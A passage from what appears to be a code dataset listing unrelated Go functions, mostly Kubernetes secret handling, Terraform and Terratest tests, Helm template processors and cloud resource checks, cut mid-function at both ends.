{\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &obj.SecretType)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state\", &obj.State)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state_description\", &obj.StateDescription)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"updated_at\", &obj.UpdatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"versions_total\", &obj.VersionsTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\treflect.ValueOf(result).Elem().Set(reflect.ValueOf(obj))\n\treturn\n}", "func createSecret(hostFactory cmdutil.Factory, clientConfig *clientcmdapi.Config, namespace, contextName, secretName string, dryRun bool) (runtime.Object, error) {\n\t// Minify the kubeconfig to ensure that there is only information\n\t// relevant to the cluster we are registering.\n\tnewClientConfig, err := minifyConfig(clientConfig, contextName)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to minify the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Flatten the kubeconfig to ensure that all the referenced file\n\t// contents are inlined.\n\terr = clientcmdapi.FlattenConfig(newClientConfig)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to flatten the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Boilerplate to create the secret in the host cluster.\n\tclientset, err := hostFactory.ClientSet()\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to serialize the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\treturn util.CreateKubeconfigSecret(clientset, newClientConfig, namespace, secretName, dryRun)\n}", "func TestTerraformOutputs(t *testing.T) {\n\tresult := MakeTerraformOutputs(\n\t\tmap[string]interface{}{\n\t\t\t\"nil_property_value\": nil,\n\t\t\t\"bool_property_value\": false,\n\t\t\t\"number_property_value\": 42,\n\t\t\t\"float_property_value\": 99.6767932,\n\t\t\t\"string_property_value\": \"ognirts\",\n\t\t\t\"my_string_property_value\": MyString(\"ognirts\"),\n\t\t\t\"array_property_value\": []interface{}{\"an array\"},\n\t\t\t\"object_property_value\": map[string]interface{}{\n\t\t\t\t\"property_a\": \"a\",\n\t\t\t\t\"property_b\": true,\n\t\t\t},\n\t\t\t\"map_property_value\": map[string]interface{}{\n\t\t\t\t\"propertyA\": \"a\",\n\t\t\t\t\"propertyB\": true,\n\t\t\t\t\"propertyC\": map[string]interface{}{\n\t\t\t\t\t\"nestedPropertyA\": true,\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"nested_resource\": []interface{}{\n\t\t\t\tmap[string]interface{}{\n\t\t\t\t\t\"configuration\": map[string]interface{}{\n\t\t\t\t\t\t\"configurationValue\": true,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"optional_config\": []interface{}{\n\t\t\t\tmap[string]interface{}{\n\t\t\t\t\t\"some_value\": true,\n\t\t\t\t\t\"some_other_value\": \"a value\",\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"optional_config_other\": []interface{}{\n\t\t\t\tmap[string]interface{}{\n\t\t\t\t\t\"some_value\": true,\n\t\t\t\t\t\"some_other_value\": \"a value\",\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\tmap[string]*schema.Schema{\n\t\t\t// Type mapPropertyValue as a map so that keys aren't mangled in the usual way.\n\t\t\t\"float_property_value\": {Type: schema.TypeFloat},\n\t\t\t\"my_string_property_value\": {Type: schema.TypeString},\n\t\t\t\"map_property_value\": {Type: schema.TypeMap},\n\t\t\t\"nested_resource\": {\n\t\t\t\tType: schema.TypeList,\n\t\t\t\tMaxItems: 2,\n\t\t\t\t// Embed a `*schema.Resource` to validate that type directed\n\t\t\t\t// walk of the schema successfully walks inside Resources as well\n\t\t\t\t// as Schemas.\n\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\"configuration\": {Type: schema.TypeMap},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"optional_config\": {\n\t\t\t\tType: schema.TypeList,\n\t\t\t\tMaxItems: 1,\n\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\"some_value\": {Type: schema.TypeBool},\n\t\t\t\t\t\t\"some_other_value\": {Type: schema.TypeString},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"optional_config_other\": {\n\t\t\t\tType: schema.TypeList,\n\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\"some_value\": {Type: schema.TypeBool},\n\t\t\t\t\t\t\"some_other_value\": {Type: schema.TypeString},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\tmap[string]*SchemaInfo{\n\t\t\t// Reverse map string_property_value to the stringo property.\n\t\t\t\"string_property_value\": {\n\t\t\t\tName: \"stringo\",\n\t\t\t},\n\t\t\t\"optional_config_other\": {\n\t\t\t\tName: \"optionalConfigOther\",\n\t\t\t\tMaxItemsOne: boolPointer(true),\n\t\t\t},\n\t\t},\n\t\tnil, /* assets */\n\t\tfalse, /*useRawNames*/\n\t)\n\tassert.Equal(t, resource.NewPropertyMapFromMap(map[string]interface{}{\n\t\t\"nilPropertyValue\": nil,\n\t\t\"boolPropertyValue\": false,\n\t\t\"numberPropertyValue\": 42,\n\t\t\"floatPropertyValue\": 99.6767932,\n\t\t\"stringo\": \"ognirts\",\n\t\t\"myStringPropertyValue\": \"ognirts\",\n\t\t\"arrayPropertyValue\": []interface{}{\"an array\"},\n\t\t\"objectPropertyValue\": map[string]interface{}{\n\t\t\t\"propertyA\": \"a\",\n\t\t\t\"propertyB\": true,\n\t\t},\n\t\t\"mapPropertyValue\": map[string]interface{}{\n\t\t\t\"propertyA\": \"a\",\n\t\t\t\"propertyB\": true,\n\t\t\t\"propertyC\": map[string]interface{}{\n\t\t\t\t\"nestedPropertyA\": true,\n\t\t\t},\n\t\t},\n\t\t\"nestedResources\": []map[string]interface{}{{\n\t\t\t\"configuration\": map[string]interface{}{\n\t\t\t\t\"configurationValue\": true,\n\t\t\t},\n\t\t}},\n\t\t\"optionalConfig\": map[string]interface{}{\n\t\t\t\"someValue\": true,\n\t\t\t\"someOtherValue\": \"a value\",\n\t\t},\n\t\t\"optionalConfigOther\": map[string]interface{}{\n\t\t\t\"someValue\": true,\n\t\t\t\"someOtherValue\": \"a value\",\n\t\t},\n\t}), result)\n}", "func (o *SecretValue) HasType() bool {\n\tif o != nil && o.Type != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *Stack) ApplyTemplate(c *stack.Credential) (*stack.Template, error) {\n\tcred, ok := c.Credential.(*Credential)\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"credential is not of type do.Credential: %T\", c.Credential)\n\t}\n\n\tbootstrap, ok := c.Bootstrap.(*Bootstrap)\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"bootstrap is not of type do.Bootstrap: %T\", c.Bootstrap)\n\t}\n\n\ttemplate := s.Builder.Template\n\ttemplate.Provider[\"digitalocean\"] = map[string]interface{}{\n\t\t\"token\": cred.AccessToken,\n\t}\n\n\tkeyID, err := strconv.Atoi(bootstrap.KeyID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdroplet, err := s.modifyDroplets(keyID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttemplate.Resource[\"digitalocean_droplet\"] = droplet\n\n\tif err := template.ShadowVariables(\"FORBIDDEN\", \"digitalocean_access_token\"); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := template.Flush(); err != nil {\n\t\treturn nil, err\n\t}\n\n\tcontent, err := template.JsonOutput()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &stack.Template{\n\t\tContent: content,\n\t}, nil\n}", "func (t envTemplate) Secrets() []string {\n\treturn []string{}\n}", "func Secret(c *cli.Context) string {\n\tv := c.String(flagSecret)\n\tif v == \"\" {\n\t\treturn env.GetString(EnvBittrexSecret)\n\t}\n\n\treturn v\n}", "func CreateIngressKubeSecret(t *testing.T, ctx framework.TestContext, credNames []string,\n\tingressType ingress.CallType, ingressCred IngressCredential) {\n\t// Get namespace for ingress gateway pod.\n\tistioCfg := istio.DefaultConfigOrFail(t, ctx)\n\tsystemNS := namespace.ClaimOrFail(t, ctx, istioCfg.SystemNamespace)\n\n\tif len(credNames) == 0 {\n\t\tt.Log(\"no credential names are specified, skip creating ingress secret\")\n\t\treturn\n\t}\n\t// Create Kubernetes secret for ingress gateway\n\tkubeAccessor := ctx.Environment().(*kube.Environment).Accessor\n\tfor _, cn := range credNames {\n\t\tsecret := createSecret(ingressType, cn, systemNS.Name(), ingressCred)\n\t\terr := kubeAccessor.CreateSecret(systemNS.Name(), secret)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Failed to create secret (error: %s)\", err)\n\t\t}\n\t}\n\t// Check if Kubernetes secret is ready\n\tmaxRetryNumber := 5\n\tcheckRetryInterval := time.Second * 1\n\tfor _, cn := range credNames {\n\t\tt.Logf(\"Check ingress Kubernetes secret %s:%s...\", systemNS.Name(), cn)\n\t\tfor i := 0; i < maxRetryNumber; i++ {\n\t\t\t_, err := kubeAccessor.GetSecret(systemNS.Name()).Get(cn, metav1.GetOptions{})\n\t\t\tif err != nil {\n\t\t\t\ttime.Sleep(checkRetryInterval)\n\t\t\t} else {\n\t\t\t\tt.Logf(\"Secret %s:%s is ready.\", systemNS.Name(), cn)\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n}", "func createSupportBundleSpecSecret(app apptypes.AppType, sequence int64, kotsKinds *kotsutil.KotsKinds, secretName string, builtBundle *troubleshootv1beta2.SupportBundle, opts types.TroubleshootOptions, clientset kubernetes.Interface) error {\n\ts := serializer.NewYAMLSerializer(serializer.DefaultMetaFactory, scheme.Scheme, scheme.Scheme)\n\tvar b bytes.Buffer\n\tif err := s.Encode(builtBundle, &b); err != nil {\n\t\treturn errors.Wrap(err, \"failed to encode support bundle\")\n\t}\n\n\ttemplatedSpec := b.Bytes()\n\n\trenderedSpec, err := helper.RenderAppFile(app, &sequence, templatedSpec, kotsKinds, util.PodNamespace)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed render support bundle spec\")\n\t}\n\n\t// unmarshal the spec, look for image replacements in collectors and then remarshal\n\t// we do this after template rendering to support templating and then replacement\n\tsupportBundle, err := kotsutil.LoadSupportBundleFromContents(renderedSpec)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to unmarshal rendered support bundle spec\")\n\t}\n\n\tvar registrySettings registrytypes.RegistrySettings\n\tif !util.IsHelmManaged() {\n\t\ts, err := store.GetStore().GetRegistryDetailsForApp(app.GetID())\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to get registry settings for app\")\n\t\t}\n\t\tregistrySettings = s\n\t}\n\n\tcollectors, err := registry.UpdateCollectorSpecsWithRegistryData(supportBundle.Spec.Collectors, registrySettings, kotsKinds.Installation, kotsKinds.License, &kotsKinds.KotsApplication)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to update collectors\")\n\t}\n\tsupportBundle.Spec.Collectors = collectors\n\tb.Reset()\n\tif err := s.Encode(supportBundle, &b); err != nil {\n\t\treturn errors.Wrap(err, \"failed to encode support bundle\")\n\t}\n\trenderedSpec = b.Bytes()\n\n\texistingSecret, err := clientset.CoreV1().Secrets(util.PodNamespace).Get(context.TODO(), secretName, metav1.GetOptions{})\n\tlabels := kotstypes.MergeLabels(kotstypes.GetKotsadmLabels(), kotstypes.GetTroubleshootLabels())\n\tif err != nil {\n\t\tif kuberneteserrors.IsNotFound(err) {\n\t\t\tsecret := &corev1.Secret{\n\t\t\t\tTypeMeta: metav1.TypeMeta{\n\t\t\t\t\tAPIVersion: \"v1\",\n\t\t\t\t\tKind: \"Secret\",\n\t\t\t\t},\n\t\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\t\tName: secretName,\n\t\t\t\t\tNamespace: util.PodNamespace,\n\t\t\t\t\tLabels: labels,\n\t\t\t\t},\n\t\t\t\tData: map[string][]byte{\n\t\t\t\t\tSpecDataKey: renderedSpec,\n\t\t\t\t},\n\t\t\t}\n\n\t\t\t_, err = clientset.CoreV1().Secrets(util.PodNamespace).Create(context.TODO(), secret, metav1.CreateOptions{})\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"failed to create support bundle secret\")\n\t\t\t}\n\n\t\t\tlogger.Debugf(\"created %q support bundle spec secret\", secretName)\n\t\t} else {\n\t\t\treturn errors.Wrap(err, \"failed to read support bundle secret\")\n\t\t}\n\t} else {\n\t\tif existingSecret.Data == nil {\n\t\t\texistingSecret.Data = map[string][]byte{}\n\t\t}\n\t\texistingSecret.Data[SpecDataKey] = renderedSpec\n\t\texistingSecret.ObjectMeta.Labels = labels\n\n\t\t_, err = clientset.CoreV1().Secrets(util.PodNamespace).Update(context.TODO(), existingSecret, metav1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to update support bundle secret\")\n\t\t}\n\t}\n\treturn nil\n}", "func (r role) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) {\n\tvar aggregationRule string\n\n\tif obj.GroupVersionKind() != clusterRoleGVC && obj.GroupVersionKind() != roleGVC {\n\t\treturn false, nil, nil\n\t}\n\n\tmeta, err := processor.ProcessObjMeta(appMeta, obj)\n\tif err != nil {\n\t\treturn true, nil, err\n\t}\n\n\tif existingAggRule := obj.Object[\"aggregationRule\"]; existingAggRule != nil {\n\t\tif obj.GroupVersionKind().Kind == \"Role\" {\n\t\t\treturn true, nil, fmt.Errorf(\"unable to set aggregationRule to the kind Role in %q: unsupported\", obj.GetName())\n\t\t}\n\n\t\tif existingAggRule.(map[string]interface{})[\"clusterRoleSelectors\"] != nil {\n\t\t\taggRuleMap := map[string]interface{}{\"aggregationRule\": existingAggRule}\n\n\t\t\taggregationRule, err = yamlformat.Marshal(aggRuleMap, 0)\n\t\t\tif err != nil {\n\t\t\t\treturn true, nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\trules, err := yamlformat.Marshal(map[string]interface{}{\"rules\": obj.Object[\"rules\"]}, 0)\n\tif err != nil {\n\t\treturn true, nil, err\n\t}\n\n\treturn true, &crResult{\n\t\tname: appMeta.TrimName(obj.GetName()),\n\t\tdata: struct {\n\t\t\tMeta string\n\t\t\tAggregationRule string\n\t\t\tRules string\n\t\t}{Meta: meta, AggregationRule: aggregationRule, Rules: rules},\n\t}, nil\n}", "func (t *Type) IsResource() bool {\n\treturn false\n}", "func IsAllowedP2shType(sc txscript.ScriptClass) bool {\n\t_, ok := allowedP2sh[sc]\n\treturn ok\n}", "func TestTags(t *testing.T) {\n awsRegion := \"us-east-2\"\n tagName := \"Flugel-test\"\n tagOwner := \"InfraTeam-test\"\n\n terraformOpts := terraform.WithDefaultRetryableErrors(t, &terraform.Options{\n TerraformDir: \"../\",\n\n //Now i must map the tags.\n Vars: map[string]interface{}{\n \"tag_name\": tagName,\n \"tag_owner\": tagOwner,\n },\n\n //Then set the region to make the deploy in.\n EnvVars: map[string]string{\n \"AWS_DEFAULT_REGION\": awsRegion,\n },\n },\n )\n\n //After all the testing, the infra must be destroyed.\n defer terraform.Destroy(t, terraformOpts)\n\n //Now, let's run the deploy with all the parameters set.\n terraform.InitAndApply(t, terraformOpts)\n\n //I get the instance and bucket id's, and make first verifications.\n instanceID1 := terraform.Output(t, terraformOpts, \"instance_name_web1\")\n instanceTags1 := aws.GetTagsForEc2Instance(t, awsRegion, instanceID1)\n testTag1, containsTag := instanceTags1[\"Name\"]\n assert.True(t, containsTag, \"True\")\n assert.Equal(t, tagName, testTag1)\n testTag2, containsTag := instanceTags1[\"Owner\"]\n assert.True(t, containsTag, \"True\")\n assert.Equal(t, tagOwner, testTag2)\n\n instanceID2 := terraform.Output(t, terraformOpts, \"instance_name_web2\")\n instanceTags2 := aws.GetTagsForEc2Instance(t, awsRegion, instanceID2)\n testTag3, containsTag := instanceTags2[\"Name\"]\n assert.True(t, containsTag, \"True\")\n assert.Equal(t, tagName, testTag3)\n testTag4, containsTag := instanceTags2[\"Owner\"]\n assert.True(t, containsTag, \"True\")\n assert.Equal(t, tagOwner, testTag4)\n\n //It would be easier to simply parse plain text, but as i put myself into this let's ride with it.\n\n lburl := \"http://\" + terraform.Output(t, terraformOpts, \"load_balancer_url\") + \"/index.html\"\n maxRetries := 3\n timeBetweenRetries := 5 * time.Second\n\n http_helper.HttpGetWithRetryWithCustomValidation(t, lburl, nil, maxRetries, timeBetweenRetries, validate)\n\n // There's no module with \"get X bucket tags\", so i get the bucket id from TF, and separately i seek the bucket that contains\n // tags \"Name\" and \"Owner\" with the desired content, and make sure the id returned matches the previously deployed bucket. \n bucketID := terraform.Output(t, terraformOpts, \"bucket_id\")\n bucketwithTagN := aws.FindS3BucketWithTag (t, awsRegion, \"Name\", tagName)\n bucketwithTagO := aws.FindS3BucketWithTag (t, awsRegion, \"Owner\", tagOwner)\n assert.Equal(t, bucketwithTagN, bucketID)\n assert.Equal(t, bucketwithTagO, bucketID)\n\n}", "func (w vwh) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) {\n\tif obj.GroupVersionKind() != vwhGVK {\n\t\treturn false, nil, nil\n\t}\n\tname := appMeta.TrimName(obj.GetName())\n\n\twhConf := v1.ValidatingWebhookConfiguration{}\n\terr := runtime.DefaultUnstructuredConverter.FromUnstructured(obj.Object, &whConf)\n\tif err != nil {\n\t\treturn true, nil, errors.Wrap(err, \"unable to cast to ValidatingWebhookConfiguration\")\n\t}\n\tfor i, whc := range whConf.Webhooks {\n\t\twhc.ClientConfig.Service.Name = appMeta.TemplatedName(whc.ClientConfig.Service.Name)\n\t\twhc.ClientConfig.Service.Namespace = strings.ReplaceAll(whc.ClientConfig.Service.Namespace, appMeta.Namespace(), `{{ .Release.Namespace }}`)\n\t\twhConf.Webhooks[i] = whc\n\t}\n\twebhooks, _ := yaml.Marshal(whConf.Webhooks)\n\twebhooks = bytes.TrimRight(webhooks, \"\\n \")\n\tcertName, _, err := unstructured.NestedString(obj.Object, \"metadata\", \"annotations\", \"cert-manager.io/inject-ca-from\")\n\tif err != nil {\n\t\treturn true, nil, errors.Wrap(err, \"unable get webhook certName\")\n\t}\n\tcertName = strings.TrimPrefix(certName, appMeta.Namespace()+\"/\")\n\tcertName = appMeta.TrimName(certName)\n\tres := fmt.Sprintf(vwhTempl, appMeta.ChartName(), name, certName, string(webhooks))\n\treturn true, &vwhResult{\n\t\tname: name,\n\t\tdata: []byte(res),\n\t}, nil\n}", "func checkSecret(ctx context.Context, k *kabanerov1alpha2.Kabanero, c client.Client, reqLogger logr.Logger) error {\n\n\tif len(k.Spec.Sso.AdminSecretName) == 0 {\n\t\treturn errors.New(\"The SSO admin secret name must be specified in the Kabanero CR instance\")\n\t}\n\t\n\tsecretInstance := &corev1.Secret{}\n\terr := c.Get(context.Background(), types.NamespacedName{\n\t\tName: k.Spec.Sso.AdminSecretName,\n\t\tNamespace: k.ObjectMeta.Namespace}, secretInstance)\n\n\tif err != nil {\n\t\tif kerrors.IsNotFound(err) == false {\n\t\t\treturn fmt.Errorf(\"The SSO admin secret was not found: %v\", err.Error())\n\t\t}\n\n\t\treturn fmt.Errorf(\"Could not retrieve the SSO admin secret: %v\", err.Error())\n\t}\n\n\t// Make sure the required keys are assigned.\n\tssoAdminUserName, ok := secretInstance.Data[\"username\"]\n\tif (!ok) || (len(ssoAdminUserName) == 0) {\n\t\treturn fmt.Errorf(\"The SSO admin secret %v does not contain key 'username'\", k.Spec.Sso.AdminSecretName)\n\t}\n\n\tssoAdminPassword, ok := secretInstance.Data[\"password\"]\n\tif (!ok) || (len(ssoAdminPassword) == 0) {\n\t\treturn fmt.Errorf(\"The SSO admin secret %v does not contain key 'password'\", k.Spec.Sso.AdminSecretName)\n\t}\n\n\tssoRealm, ok := secretInstance.Data[\"realm\"]\n\tif (!ok) || (len(ssoRealm) == 0) {\n\t\treturn fmt.Errorf(\"The SSO admin secret %v does not contain key 'realm'\", k.Spec.Sso.AdminSecretName)\n\t}\n\t\n\treturn nil\n}", "func SecretController(c *gin.Context) {\n\tc.JSON(200, &models.ResponsePayload{Success: true, Message: c.MustGet(\"id\").(string)})\n}", "func (ids Storage) SecretHandler(w http.ResponseWriter, r *http.Request) {\n\tvar status int\n\tvar ret string\n\tswitch r.Method {\n\tcase http.MethodGet:\n\t\tif r.URL.Path == \"/\" {\n\t\t\tlog.Println(\"Bad Request\")\n\t\t\tw.WriteHeader(http.StatusBadRequest)\n\t\t\tfmt.Fprint(w, \"Bad, Bad Request!\\n\")\n\t\t\treturn\n\t\t}\n\t\tret, status = ids.secretGet(r.URL.Path[1:])\n\tcase http.MethodPost:\n\t\tvar bodyBytes []byte\n\t\tvar err error\n\t\tif r.Body != nil {\n\t\t\tbodyBytes, err = ioutil.ReadAll(r.Body)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"Body reading error: %v\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tdefer r.Body.Close()\n\t\t}\n\n\t\tret, status = ids.secretPost(bodyBytes)\n\n\tdefault:\n\t\tstatus = http.StatusMethodNotAllowed\n\t\tret = \"Method not allowed!\\n\"\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(status)\n\tfmt.Fprintln(w, ret)\n}", "func (m *ProjectionMapping) ProjectSecret(credsPath string) (*v1.Secret, error) {\n\tdata := map[string][]byte{}\n\t// the k8s v1.Secret is a combination of all its Secret's datasources\n\t// so project each one, into the v1.Secret\n\n\tfor _, s := range m.Data {\n\t\td, err := s.Project(credsPath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif s.Encrypt && m.crypter == nil {\n\t\t\treturn nil, ErrEncryptionRequestedButNoEncryptionConfigSpecified\n\t\t}\n\t\tif s.Encrypt {\n\t\t\ted, err := m.crypter.Encrypt(d)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tdata[s.Name] = ed\n\t\t} else {\n\t\t\tdata[s.Name] = d\n\t\t}\n\t}\n\t// include decryption keys if requested in the generated Secret\n\tif m.crypter != nil && m.Encryption.IncludeDecryptionKeys {\n\t\tkeys, err := m.crypter.DecryptionKeys()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor i, k := range keys {\n\t\t\tjs, err := json.Marshal(k)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tdata[fmt.Sprintf(\"%s%d.json\", DecryptionKeysPrefix, i+1)] = js\n\t\t}\n\t}\n\tsekrit := v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: m.Name,\n\t\t\tNamespace: m.Namespace,\n\t\t},\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tType: v1.SecretTypeOpaque,\n\t\tData: data,\n\t}\n\tif m.c.AddDeployLabels() {\n\t\tsekrit.ObjectMeta.Labels = map[string]string{\n\t\t\tm.c.LabelVersionKey(): m.c.Generation(),\n\t\t\tm.c.LabelManagedKey(): \"true\",\n\t\t}\n\t}\n\treturn &sekrit, nil\n}", "func (o *SecretValue) GetType() string {\n\tif o == nil || o.Type == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Type\n}", "func CheckResource(nsId string, resourceType string, resourceId string) (bool, error) {\n\n\t// Check parameters' emptiness\n\tif nsId == \"\" {\n\t\terr := fmt.Errorf(\"CheckResource failed; nsId given is null.\")\n\t\treturn false, err\n\t} else if resourceType == \"\" {\n\t\terr := fmt.Errorf(\"CheckResource failed; resourceType given is null.\")\n\t\treturn false, err\n\t} else if resourceId == \"\" {\n\t\terr := fmt.Errorf(\"CheckResource failed; resourceId given is null.\")\n\t\treturn false, err\n\t}\n\n\t// Check resourceType's validity\n\tif resourceType == common.StrImage ||\n\t\tresourceType == common.StrSSHKey ||\n\t\tresourceType == common.StrSpec ||\n\t\tresourceType == common.StrVNet ||\n\t\tresourceType == common.StrSecurityGroup {\n\t\t//resourceType == \"subnet\" ||\n\t\t//resourceType == \"publicIp\" ||\n\t\t//resourceType == \"vNic\" {\n\t\t// continue\n\t} else {\n\t\terr := fmt.Errorf(\"invalid resource type\")\n\t\treturn false, err\n\t}\n\n\terr := common.CheckString(nsId)\n\tif err != nil {\n\t\tcommon.CBLog.Error(err)\n\t\treturn false, err\n\t}\n\n\terr = common.CheckString(resourceId)\n\tif err != nil {\n\t\tcommon.CBLog.Error(err)\n\t\treturn false, err\n\t}\n\n\tfmt.Println(\"[Check resource] \" + resourceType + \", \" + resourceId)\n\n\tkey := common.GenResourceKey(nsId, resourceType, resourceId)\n\t//fmt.Println(key)\n\n\tkeyValue, err := common.CBStore.Get(key)\n\tif err != nil {\n\t\tcommon.CBLog.Error(err)\n\t\treturn false, err\n\t}\n\tif keyValue != nil {\n\t\treturn true, nil\n\t}\n\treturn false, nil\n\n}", "func (ty SecretType) ToK8s() v1.SecretType {\n\tif s := secreTypes[ty]; s != \"\" {\n\t\treturn s\n\t}\n\treturn v1.SecretTypeOpaque\n}", "func (s SecretForTLSGeneratorV1) StructuredGenerate() (runtime.Object, error) {\n\tif err := s.validate(); err != nil {\n\t\treturn nil, err\n\t}\n\ttlsCrt, err := readFile(s.Cert)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttlsKey, err := readFile(s.Key)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsecret := &api.Secret{}\n\tsecret.Name = s.Name\n\tsecret.Type = api.SecretTypeTLS\n\tsecret.Data = map[string][]byte{}\n\tsecret.Data[api.TLSCertKey] = []byte(tlsCrt)\n\tsecret.Data[api.TLSPrivateKeyKey] = []byte(tlsKey)\n\treturn secret, nil\n}", "func validateSecretWasStoredInPlugin(t *testing.T, secretsStore secretskvs.SecretsKVStore, ctx context.Context, orgId int64, namespace1 string, typ string) {\n\tt.Helper()\n\tresPlugin, err := secretsStore.Keys(ctx, orgId, namespace1, typ)\n\trequire.NoError(t, err)\n\trequire.Equal(t, 1, len(resPlugin))\n}", "func TestRelaxedSecretHandling(t *testing.T) {\n\tty := tftypes.Object{\n\t\tAttributeTypes: map[string]tftypes.Type{\n\t\t\t\"x\": tftypes.String,\n\t\t},\n\t}\n\n\tencoder, err := newObjectEncoder(ty, map[TerraformPropertyName]Encoder{\n\t\t\"x\": newStringEncoder(),\n\t}, &trivialLocalPropertyNames{})\n\trequire.NoError(t, err)\n\n\tv, err := EncodePropertyMap(encoder, resource.PropertyMap{\"x\": resource.NewStringProperty(\"OK\")})\n\trequire.NoError(t, err)\n\n\texpect := tftypes.NewValue(ty, map[string]tftypes.Value{\n\t\t\"x\": tftypes.NewValue(tftypes.String, \"OK\"),\n\t})\n\n\trequire.Equal(t, expect, v)\n}", "func (me TxsdImpactSimpleContentExtensionType) IsPolicy() bool { return me.String() == \"policy\" }", "func (ph *phaseHandler) createResource(sso *v1alpha1.Keycloak, resourceName string) (bool, error) {\n\tkc := sso.DeepCopy()\n\tresourceHelper := newResourceHelper(kc)\n\tresource, err := resourceHelper.createResource(resourceName)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\n\tgvk := resource.GetObjectKind().GroupVersionKind()\n\tapiVersion, kind := gvk.ToAPIVersionAndKind()\n\tresourceClient, _, err := ph.dynamicResourceClientFactory(apiVersion, kind, kc.Namespace)\n\tif err != nil {\n\t\t// The resource cannot be created because the CRD is not installed in the cluster.\n\t\t// We can try again later.\n\t\treturn false, nil\n\t}\n\n\tresource, err = resourceClient.Create(resource)\n\tif err != nil && !errors2.IsAlreadyExists(err) {\n\t\treturn false, errors.Wrap(err, \"failed to create unstructured object\")\n\t}\n\n\treturn true, nil\n}", "func updateSecret(client *k8s.Client, secret *corev1.Secret, accessKey *iam.AccessKey) error {\n\n\tid := aws.StringValue(accessKey.AccessKeyId)\n\tkey := aws.StringValue(accessKey.SecretAccessKey)\n\n\t// Defining template for credentials file\n\tdefaultCredentials := AWSCredentials{\"default\", id, key, \"eu-west-1\"}\n\topenshiftCredentials := AWSCredentials{\"openshift\", id, key, \"eu-west-1\"}\n\tcredentialsFileTemplate, err := template.New(\"credentials\").Parse(\n\t\t\"\" +\n\t\t\t\"[{{ .Profile}}]\\n\" +\n\t\t\t\"aws_access_key_id={{ .ID}}\\n\" +\n\t\t\t\"aws_secret_access_key={{ .Secret}}\\n\" +\n\t\t\t\"region={{ .Region}}\",\n\t)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar defaultCredentialsData bytes.Buffer\n\tvar openshiftCredentialsData bytes.Buffer\n\tcredentialsFileTemplate.Execute(&defaultCredentialsData, defaultCredentials)\n\tcredentialsFileTemplate.Execute(&openshiftCredentialsData, openshiftCredentials)\n\n\tsecret.StringData = make(map[string]string)\n\tsecret.StringData[accessKeyIdPropName] = aws.StringValue(accessKey.AccessKeyId)\n\tsecret.StringData[secretAccessKeyPropName] = aws.StringValue(accessKey.SecretAccessKey)\n\tsecret.StringData[configPropName] = defaultCredentialsData.String()\n\tsecret.StringData[credentialsPropName] = openshiftCredentialsData.String()\n\n\treturn client.Update(context.TODO(), secret)\n}", "func (o 